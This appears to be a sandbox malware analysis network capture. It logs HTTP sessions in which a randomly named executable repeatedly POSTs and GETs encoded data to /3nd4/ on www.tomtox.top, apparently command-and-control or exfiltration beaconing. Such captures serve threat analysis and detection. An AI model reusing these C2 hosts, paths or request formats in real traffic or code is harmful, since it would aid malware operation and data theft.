                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:07 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                            Set-Cookie: vsid=912vr474996667662843165; expires=Wed, 26-Sep-2029 15:31:07 GMT; Max-Age=157680000; path=/; domain=www.martaschrimpf.info; HttpOnly
                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_UTaKIVKsTSF0q4YKRaAzBOk7RXtRKUXOaL8J8dMvHimx9H6Z1tnNCUvz1TW4Eli32Nfb7N5Nkxd6NZsnOzcMmA==
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Raw: 62 62 34 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65
                                                                                                                                                                            Data Ascii: bb40<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.ne
                                                                                                                                                                            Sep 27, 2024 17:31:09.486859083 CEST1236INData Raw: 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69
                                                                                                                                                                            Data Ascii: t"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" i
                                                                                                                                                                            Sep 27, 2024 17:31:09.486870050 CEST1236INData Raw: 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e
                                                                                                                                                                            Data Ascii: tion(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languag
                                                                                                                                                                            Sep 27, 2024 17:31:09.487476110 CEST1236INData Raw: 67 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75
                                                                                                                                                                            Data Ascii: guages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash
                                                                                                                                                                            Sep 27, 2024 17:31:09.487488031 CEST1236INData Raw: 2b 68 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22
                                                                                                                                                                            Data Ascii: +h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}els
                                                                                                                                                                            Sep 27, 2024 17:31:09.490505934 CEST1236INData Raw: 62 5d 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69 73 70
                                                                                                                                                                            Data Ascii: b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttri
                                                                                                                                                                            Sep 27, 2024 17:31:09.490519047 CEST1236INData Raw: 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 7c 7c 61 5b 30 5d 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70
                                                                                                                                                                            Data Ascii: ply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVer
                                                                                                                                                                            Sep 27, 2024 17:31:09.490645885 CEST1236INData Raw: 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 46 69 65 6c 64 22 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70
                                                                                                                                                                            Data Ascii: tion"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&
                                                                                                                                                                            Sep 27, 2024 17:31:09.490665913 CEST1236INData Raw: 2e 63 6d 70 5f 73 65 74 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f
                                                                                                                                                                            Data Ascii: .cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEve
                                                                                                                                                                            Sep 27, 2024 17:31:09.493076086 CEST1236INData Raw: 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74
                                                                                                                                                                            Data Ascii: pt type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.martaschrimpf.info/px.js?ch=1"></script><script type="text/javascript" src="http://www.martaschrimpf.info/px.js?ch=2"></script><script type="text/javascr
                                                                                                                                                                            Sep 27, 2024 17:31:09.515010118 CEST1236INData Raw: 63 3a 20 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 32 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75
                                                                                                                                                                            Data Ascii: c: url("http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot");src: url("http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix") format("embedded-opentype"),url("http://i2.cdn-ima


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            17192.168.2.563711162.0.238.43805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:15.989598036 CEST832OUTPOST /3nd4/ HTTP/1.1
                                                                                                                                                                            Host: www.tomtox.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tomtox.top
                                                                                                                                                                            Referer: http://www.tomtox.top/3nd4/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 39 56 55 44 67 78 52 7a 41 74 59 4e 51 7a 55 4f 6e 48 47 57 79 32 36 78 36 54 44 30 47 69 46 63 69 30 75 44 4b 6c 6d 41 55 65 4c 7a 53 6e 41 73 4a 4c 5a 47 43 6d 32 6a 32 32 6e 34 71 39 5a 4c 79 6b 41 6a 43 5a 32 65 6d 59 35 30 70 31 50 49 65 6e 6a 49 38 47 57 63 71 6e 4f 71 48 76 70 71 75 54 2b 56 4c 76 77 4f 70 54 31 5a 78 43 71 39 45 6b 51 65 55 62 7a 53 33 77 2f 34 79 6d 52 75 6a 67 53 53 75 34 4f 56 75 51 51 33 45 69 4c 49 2f 6f 53 50 43 76 52 63 2b 76 65 49 64 5a 4a 44 39 71 33 76 41 36 73 73 42 55 4b 32 74 72 48 4e 52 6a 45 71 66 69 36 71 46 61 31 4e 31 48 30 6f 53 55 72 53 4a 63 51 3d
                                                                                                                                                                            Data Ascii: Ah=9VUDgxRzAtYNQzUOnHGWy26x6TD0GiFci0uDKlmAUeLzSnAsJLZGCm2j22n4q9ZLykAjCZ2emY50p1PIenjI8GWcqnOqHvpquT+VLvwOpT1ZxCq9EkQeUbzS3w/4ymRujgSSu4OVuQQ3EiLI/oSPCvRc+veIdZJD9q3vA6ssBUK2trHNRjEqfi6qFa1N1H0oSUrSJcQ=
                                                                                                                                                                            Sep 27, 2024 17:31:16.579109907 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:16 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            18192.168.2.563712162.0.238.43805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:18.539612055 CEST852OUTPOST /3nd4/ HTTP/1.1
                                                                                                                                                                            Host: www.tomtox.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tomtox.top
                                                                                                                                                                            Referer: http://www.tomtox.top/3nd4/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 39 56 55 44 67 78 52 7a 41 74 59 4e 52 54 45 4f 6c 68 4f 57 31 57 36 32 32 7a 44 30 4e 43 46 51 69 30 69 44 4b 6b 53 51 55 73 2f 7a 53 47 77 73 49 4b 5a 47 44 6d 32 6a 2b 57 6e 39 6e 64 5a 43 79 6b 46 63 43 59 4b 65 6d 5a 5a 30 70 30 66 49 65 55 62 4c 39 57 57 65 69 48 4f 6f 4b 50 70 71 75 54 2b 56 4c 76 6b 77 70 54 74 5a 78 53 36 39 4c 6c 51 5a 58 62 7a 52 6e 51 2f 34 32 6d 52 69 6a 67 53 38 75 35 54 2b 75 54 6f 33 45 6e 76 49 2f 35 53 41 4e 76 51 58 36 76 66 6d 61 4b 56 4c 36 5a 71 6c 48 49 46 77 52 55 43 55 6c 39 71 6e 4c 42 4d 43 4d 43 57 53 56 4a 39 36 6b 33 56 42 49 33 37 69 58 4c 48 55 57 73 37 50 53 58 74 39 4c 59 57 50 70 59 2f 4d 39 64 41 34
                                                                                                                                                                            Data Ascii: Ah=9VUDgxRzAtYNRTEOlhOW1W622zD0NCFQi0iDKkSQUs/zSGwsIKZGDm2j+Wn9ndZCykFcCYKemZZ0p0fIeUbL9WWeiHOoKPpquT+VLvkwpTtZxS69LlQZXbzRnQ/42mRijgS8u5T+uTo3EnvI/5SANvQX6vfmaKVL6ZqlHIFwRUCUl9qnLBMCMCWSVJ96k3VBI37iXLHUWs7PSXt9LYWPpY/M9dA4
                                                                                                                                                                            Sep 27, 2024 17:31:19.253101110 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:19 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            19192.168.2.563713162.0.238.43805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:21.085164070 CEST1869OUTPOST /3nd4/ HTTP/1.1
                                                                                                                                                                            Host: www.tomtox.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.tomtox.top
                                                                                                                                                                            Referer: http://www.tomtox.top/3nd4/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 39 56 55 44 67 78 52 7a 41 74 59 4e 52 54 45 4f 6c 68 4f 57 31 57 36 32 32 7a 44 30 4e 43 46 51 69 30 69 44 4b 6b 53 51 55 73 6e 7a 52 30 6f 73 4b 70 78 47 45 6d 32 6a 39 57 6e 38 6e 64 59 51 79 67 67 56 43 59 48 38 6d 64 70 30 70 57 48 49 50 46 62 4c 33 57 57 65 67 48 4f 72 48 76 70 46 75 53 50 63 4c 76 30 77 70 54 74 5a 78 58 32 39 50 30 51 5a 52 62 7a 53 33 77 2f 73 79 6d 51 33 6a 67 61 4b 75 35 58 49 70 69 49 33 44 48 2f 49 36 50 2b 41 53 66 51 56 39 76 66 49 61 4b 59 56 36 5a 33 63 48 49 64 61 52 57 53 55 6c 38 72 65 4f 44 4d 65 66 45 32 7a 55 72 56 5a 79 48 6c 79 50 6b 48 73 62 34 6a 4f 5a 75 2f 77 51 6e 4a 6a 50 49 50 62 77 65 6a 6a 76 73 42 7a 48 78 77 65 41 75 39 4e 52 67 61 6c 35 37 64 2f 63 55 38 44 31 57 75 4a 47 4e 30 61 4e 67 31 44 37 4f 31 61 51 58 72 73 49 42 44 58 77 2f 67 61 35 48 36 55 72 4b 31 35 4d 42 4b 47 63 50 6b 43 4c 34 79 52 78 4a 6b 55 63 63 43 59 4d 65 6a 52 78 79 4e 5a 58 32 5a 48 66 73 77 55 59 68 76 58 6b 42 2f 2f 6a 42 4c 70 42 53 74 62 68 4a 43 6c 69 37 30 [TRUNCATED]
                                                                                                                                                                            Data Ascii: Ah=9VUDgxRzAtYNRTEOlhOW1W622zD0NCFQi0iDKkSQUsnzR0osKpxGEm2j9Wn8ndYQyggVCYH8mdp0pWHIPFbL3WWegHOrHvpFuSPcLv0wpTtZxX29P0QZRbzS3w/symQ3jgaKu5XIpiI3DH/I6P+ASfQV9vfIaKYV6Z3cHIdaRWSUl8reODMefE2zUrVZyHlyPkHsb4jOZu/wQnJjPIPbwejjvsBzHxweAu9NRgal57d/cU8D1WuJGN0aNg1D7O1aQXrsIBDXw/ga5H6UrK15MBKGcPkCL4yRxJkUccCYMejRxyNZX2ZHfswUYhvXkB//jBLpBStbhJCli70aYnf/54PsUPh6shBrZqk9JQFvhLx+YbQkXSydIifeB8oIsK5scfIxp1syLPasPVkNfc2xX8QS/2mCTq2PQ6x59mBD9Rdt1DxNR0Kzn55uNpqfLo437/DAkKH/0ADBKOUGV7kgUCU7jDIeqn3Gur++LNAXeMR2ZScryDY80Zx2LuLXpGTCY9rKrNMvwCoWeBw3bwoMgQqzMukP4lvyNKjV+ZcH4JB8QKNSZHsAY23Z0MWRBgNaiZKheCYLim0aRAFToKPpkpRybgYlPMeqOQlAYewA/rlMz0TH81ox0gBOsmOjzT6iDFZaiHno7ugjLjFUDmr/5q52k0q+JraVHsJ/9yWAs7i+dkdgAkd0ZD6xH52k1bJ4qS9oaBmmNyeqcB98UMDu7Q0lILOyk2huH6zq1mGKOnwCHqV8flRL4biZWhkvPy5rlx384KGcuhAfKoVN1Qb+9DVvKby+tDzqVV81LMOqJo/e4Ehg48yIF7mxzwYVEDqQu++vArGhR5psC7Yb0gil6UjL3rb49N6uxA4h9OX6ddGZFZ5yGB00hgE3CzC+28nBQGNvJbnaWXUOAzw+0Y3MjZ0x/J79d/brvOipCfB9k8LuFqu6ub6B4P9/TMAmbbV3ShPaNpAey1+Smxbhg4f0U/gfWxXUz9/7MtLsfb1KSnrobsjMx [TRUNCATED]
                                                                                                                                                                            Sep 27, 2024 17:31:21.683240891 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:21 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            20192.168.2.563714162.0.238.43805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:23.627716064 CEST582OUTGET /3nd4/?Ah=wX8jjEADFIUNbB1fuwn27lCA5Ee2RiJ4qVOVM3qHbtn5VxkeI5MaAkn7o3WZs+Yr7x4eULr6m9MYlnr0WXfs3GrmtSbeGOpl3yeERPUVozEPpEyzLyJ+XoeluijW2G1r0A==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.tomtox.top
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:31:24.343977928 CEST548INHTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:24 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 389
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
